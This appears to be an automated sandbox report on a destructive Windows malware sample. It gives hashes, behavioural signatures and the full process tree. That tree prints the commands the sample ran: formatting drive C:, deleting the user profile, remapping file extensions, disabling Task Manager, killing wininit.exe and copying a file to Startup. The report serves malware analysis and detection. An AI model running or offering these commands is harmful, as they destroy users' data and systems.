Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 07:09

General

  • Target

    5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe

  • Size

    1.2MB

  • MD5

    4243fc461db4268f6721a67afb54f0cc

  • SHA1

    855a8cb7e8b85db0d54b2dca0cabe13210427823

  • SHA256

    5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01

  • SHA512

    c03ffcc9c42eebb5d30d8f1fb394e90bab5d995aee0eab52fcd00e2df7fc64cb45999b9c75c65181412ef0f65609ab59423bde6286e8ebb76dad693225a22e34

  • SSDEEP

    12288:RT305Q15BbO4b76TbwCGnUc/+gB8cFKH5T3kWBmVzAbH2lixPv9fc8Cq4akGP/6u:RT3gq5bS1BsdIx3kWAzyHs0vt3N

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe
    "C:\Users\Admin\AppData\Local\Temp\5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe"
    1⤵
    • Checks computer location settings
    • Writes to the Master Boot Record (MBR)
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4820
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im taskmgr.exe /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4872
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im taskmgr.exe /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1380
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c set J=dir
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c %J% >LOGGED.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1828
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %username% >>LOGGED.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:856
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %os% >>LOGGED.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:740
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c set pi=ipconfig /all
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4400
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c %pi% >>LOGGED.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3284
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c set k=systeminfo
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2260
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c %k% >>LOGGED.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:5012
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist GunGame.exe GunGame.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3280
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist AutoIT.exe AutoIT.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3116
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist backDoorComet.exe backDoorComet.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3412
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .sys=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:3964
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .inf=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .dll=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:2952
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .bat=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:4284
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .vbs=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:4172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .vbe=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:2500
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .js=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:1132
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .cmd=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:1368
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .txt=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .reg=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:1828
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .dat=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:3916
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .COM=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:3968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cd %userprofile% && echo ^format ^C^: ^/FS^:^NTFS ^/^X ^/^Q ^/^y >QFT.bat && if exist QFT.bat start /MIN QFT.bat
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3244
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K QFT.bat
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5064
        • C:\Windows\SysWOW64\format.com
          format C: /FS:NTFS /X /Q /y
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:752
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist SegaFTS.exe copy SegaFTS.exe %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2584
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /y SegaFTS.exe %ProgramData%\Microsoft\Windows\Start Menu\Programs
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3620
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s *.*
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • System Location Discovery: System Language Discovery
      PID:4496
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h +s *.*
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:5044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib -h -s -i -a -r desktop.ini && if exist desktop.ini del desktop.ini /f /q /s
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3804
      • C:\Windows\SysWOW64\attrib.exe
        attrib -h -s -i -a -r desktop.ini
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del %userprofile%\*.* /f /q /s
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1772
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist backDoorComet.exe BackDoorComet.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist AgentOSOX.exe AgentOSOX.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:960
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist RWORM2000.VBS RWORM2000.VBS
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4308
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist Virus.exe Virus.exe
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4312
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c assoc .exe=INFECTEDFILE
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:3368
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im wininit.exe /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:944
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im wininit.exe /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2252

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\LOGGED.txt

    Filesize

    21B

    MD5

    d17922f5accd0340c258fb460e859047

    SHA1

    2856d994f442f6731df2c7bd5c28d77c4ef9c993

    SHA256

    c814876c5dea763382185fe48bf14350cbf36401c698cf50d9a91c3cc7144389

    SHA512

    ca293b91d41efe630ca168e162b5e35c2afaf279e4250435296256d2f1dd309c85f732c46715178848330a69079d7339fa20dd1c3d6e8ed3bf521c7328ea247d

  • C:\Users\Admin\QFT.bat

    Filesize

    31B

    MD5

    92aa8aa5ebf84020e37fd1718ceface0

    SHA1

    11cfce0a8d4f0c67d87a139735df4104c279e172

    SHA256

    d9c79c1614f67fd6d9949f7df5a45df7ea127bcbfc1d0a6f7e1eac9bef6b522b

    SHA512

    e433d3a1e9858d9647f27c8bf5ef77987eceb63c1437b5c423bf03ae1bb94c13c1917cdd368d4f171aa64bb607f171270e0e5879e6c336c7304bd5748ecffd5f

  • memory/4820-4-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4820-10-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB